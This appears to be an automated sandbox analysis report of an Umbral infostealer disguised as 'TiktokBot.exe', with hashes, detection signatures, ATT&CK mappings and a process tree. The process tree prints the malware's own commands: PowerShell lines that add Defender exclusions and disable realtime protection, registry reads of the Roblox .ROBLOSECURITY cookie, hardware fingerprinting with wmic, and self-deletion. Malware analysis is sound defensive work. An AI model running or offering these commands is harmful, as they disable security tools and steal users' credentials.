Analysis
-
max time kernel
120s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
29-12-2024 17:29
Behavioral task
behavioral1
Sample
TiktokBot.exe
Resource
win7-20241010-en
General
-
Target
TiktokBot.exe
-
Size
359KB
-
MD5
8669778992324151f3e3f6f454a9b7a3
-
SHA1
676cfdaf3b5b5e58441a814cabfa8fac3630ef15
-
SHA256
fa6e05570392f0c4dfe34ce0469eead7621388809cda5dd5e576c1e1ea6d6339
-
SHA512
8d86798a61443a26d16cefbeb0b74beb6837bbfb999a36ece22664b6beae8c2404520b6b4047bbbf52c3b278a2e897836e3b6657c9f082c18ce63d97a4d2e510
-
SSDEEP
6144:JloZM+rIkd8g+EtXHkv/iD4I06la43TwjJc6rrSNeb8e1myUi/Uy7P9f6dGYZthv:7oZtL+EP8I06la43TwjJc6rrSoZdnPcC
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2132-1-0x0000000000040000-0x00000000000A0000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2792 powershell.exe 808 powershell.exe 2844 powershell.exe 1804 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts TiktokBot.exe -
Deletes itself 1 IoCs
pid Process 1256 cmd.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 9 discord.com 10 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1256 cmd.exe 2256 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1424 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2256 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2132 TiktokBot.exe 2792 powershell.exe 2844 powershell.exe 1804 powershell.exe 1136 powershell.exe 808 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2132 TiktokBot.exe Token: SeIncreaseQuotaPrivilege 2140 wmic.exe Token: SeSecurityPrivilege 2140 wmic.exe Token: SeTakeOwnershipPrivilege 2140 wmic.exe Token: SeLoadDriverPrivilege 2140 wmic.exe Token: SeSystemProfilePrivilege 2140 wmic.exe Token: SeSystemtimePrivilege 2140 wmic.exe Token: SeProfSingleProcessPrivilege 2140 wmic.exe Token: SeIncBasePriorityPrivilege 2140 wmic.exe Token: SeCreatePagefilePrivilege 2140 wmic.exe Token: SeBackupPrivilege 2140 wmic.exe Token: SeRestorePrivilege 2140 wmic.exe Token: SeShutdownPrivilege 2140 wmic.exe Token: SeDebugPrivilege 2140 wmic.exe Token: SeSystemEnvironmentPrivilege 2140 wmic.exe Token: SeRemoteShutdownPrivilege 2140 wmic.exe Token: SeUndockPrivilege 2140 wmic.exe Token: SeManageVolumePrivilege 2140 wmic.exe Token: 33 2140 wmic.exe Token: 34 2140 wmic.exe Token: 35 2140 wmic.exe Token: SeIncreaseQuotaPrivilege 2140 wmic.exe Token: SeSecurityPrivilege 2140 wmic.exe Token: SeTakeOwnershipPrivilege 2140 wmic.exe Token: SeLoadDriverPrivilege 2140 wmic.exe Token: SeSystemProfilePrivilege 2140 wmic.exe Token: SeSystemtimePrivilege 2140 wmic.exe Token: SeProfSingleProcessPrivilege 2140 wmic.exe Token: SeIncBasePriorityPrivilege 2140 wmic.exe Token: SeCreatePagefilePrivilege 2140 wmic.exe Token: SeBackupPrivilege 2140 wmic.exe Token: SeRestorePrivilege 2140 wmic.exe Token: SeShutdownPrivilege 2140 wmic.exe Token: SeDebugPrivilege 2140 wmic.exe Token: SeSystemEnvironmentPrivilege 2140 wmic.exe Token: SeRemoteShutdownPrivilege 2140 wmic.exe Token: SeUndockPrivilege 2140 wmic.exe Token: SeManageVolumePrivilege 2140 wmic.exe Token: 33 2140 wmic.exe Token: 34 2140 wmic.exe Token: 35 2140 wmic.exe Token: SeDebugPrivilege 2792 powershell.exe Token: SeDebugPrivilege 2844 powershell.exe Token: SeDebugPrivilege 1804 powershell.exe Token: SeDebugPrivilege 1136 powershell.exe Token: SeIncreaseQuotaPrivilege 2276 wmic.exe Token: SeSecurityPrivilege 2276 wmic.exe Token: SeTakeOwnershipPrivilege 2276 wmic.exe Token: SeLoadDriverPrivilege 2276 wmic.exe Token: SeSystemProfilePrivilege 2276 wmic.exe Token: SeSystemtimePrivilege 2276 wmic.exe Token: SeProfSingleProcessPrivilege 2276 wmic.exe Token: SeIncBasePriorityPrivilege 2276 wmic.exe Token: SeCreatePagefilePrivilege 2276 wmic.exe Token: SeBackupPrivilege 2276 wmic.exe Token: SeRestorePrivilege 2276 wmic.exe Token: SeShutdownPrivilege 2276 wmic.exe Token: SeDebugPrivilege 2276 wmic.exe Token: SeSystemEnvironmentPrivilege 2276 wmic.exe Token: SeRemoteShutdownPrivilege 2276 wmic.exe Token: SeUndockPrivilege 2276 wmic.exe Token: SeManageVolumePrivilege 2276 wmic.exe Token: 33 2276 wmic.exe Token: 34 2276 wmic.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 2132 wrote to memory of 2140 2132 TiktokBot.exe 30 PID 2132 wrote to memory of 2140 2132 TiktokBot.exe 30 PID 2132 wrote to memory of 2140 2132 TiktokBot.exe 30 PID 2132 wrote to memory of 2804 2132 TiktokBot.exe 33 PID 2132 wrote to memory of 2804 2132 TiktokBot.exe 33 PID 2132 wrote to memory of 2804 2132 TiktokBot.exe 33 PID 2132 wrote to memory of 2792 2132 TiktokBot.exe 35 PID 2132 wrote to memory of 2792 2132 TiktokBot.exe 35 PID 2132 wrote to memory of 2792 2132 TiktokBot.exe 35 PID 2132 wrote to memory of 2844 2132 TiktokBot.exe 37 PID 2132 wrote to memory of 2844 2132 TiktokBot.exe 37 PID 2132 wrote to memory of 2844 2132 TiktokBot.exe 37 PID 2132 wrote to memory of 1804 2132 TiktokBot.exe 39 PID 2132 wrote to memory of 1804 2132 TiktokBot.exe 39 PID 2132 wrote to memory of 1804 2132 TiktokBot.exe 39 PID 2132 wrote to memory of 1136 2132 TiktokBot.exe 41 PID 2132 wrote to memory of 1136 2132 TiktokBot.exe 41 PID 2132 wrote to memory of 1136 2132 TiktokBot.exe 41 PID 2132 wrote to memory of 2276 2132 TiktokBot.exe 43 PID 2132 wrote to memory of 2276 2132 TiktokBot.exe 43 PID 2132 wrote to memory of 2276 2132 TiktokBot.exe 43 PID 2132 wrote to memory of 1240 2132 TiktokBot.exe 45 PID 2132 wrote to memory of 1240 2132 TiktokBot.exe 45 PID 2132 wrote to memory of 1240 2132 TiktokBot.exe 45 PID 2132 wrote to memory of 688 2132 TiktokBot.exe 47 PID 2132 wrote to memory of 688 2132 TiktokBot.exe 47 PID 2132 wrote to memory of 688 2132 TiktokBot.exe 47 PID 2132 wrote to memory of 808 2132 TiktokBot.exe 49 PID 2132 wrote to memory of 808 2132 TiktokBot.exe 49 PID 2132 wrote to memory of 808 2132 TiktokBot.exe 49 PID 2132 wrote to memory of 1424 2132 TiktokBot.exe 51 PID 2132 wrote to memory of 1424 2132 TiktokBot.exe 51 PID 2132 wrote to memory of 1424 2132 TiktokBot.exe 51 PID 2132 wrote to memory of 1256 2132 TiktokBot.exe 53 PID 2132 wrote to memory of 1256 2132 TiktokBot.exe 53 PID 2132 wrote to memory of 1256 2132 TiktokBot.exe 53 PID 1256 wrote to memory of 2256 1256 cmd.exe 55 PID 1256 wrote to memory of 2256 1256 cmd.exe 55 PID 1256 wrote to memory of 2256 1256 cmd.exe 55 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2804 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\TiktokBot.exe"C:\Users\Admin\AppData\Local\Temp\TiktokBot.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\TiktokBot.exe"2⤵
- Views/modifies file attributes
PID:2804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\TiktokBot.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1136
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:1240
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:808
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:1424
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\TiktokBot.exe" && pause2⤵
- Deletes itself
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2256
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD56f712c6f86d8e154c3a576048efdc604
SHA18671aa3316928498e2de24333050d19e5aeae890
SHA2567471d315d57b2ca7d6040f71368d961df42a113603187ac058a47bf2e6787cc0
SHA512f2ae9a2fca8669913dd7a5e28ef34345ab69cfcda8f346eb1a017b5c7e406281843d3203bb66819c25289dcad31c295f3329c3d3c525ab411f9e3e3f13d61bf0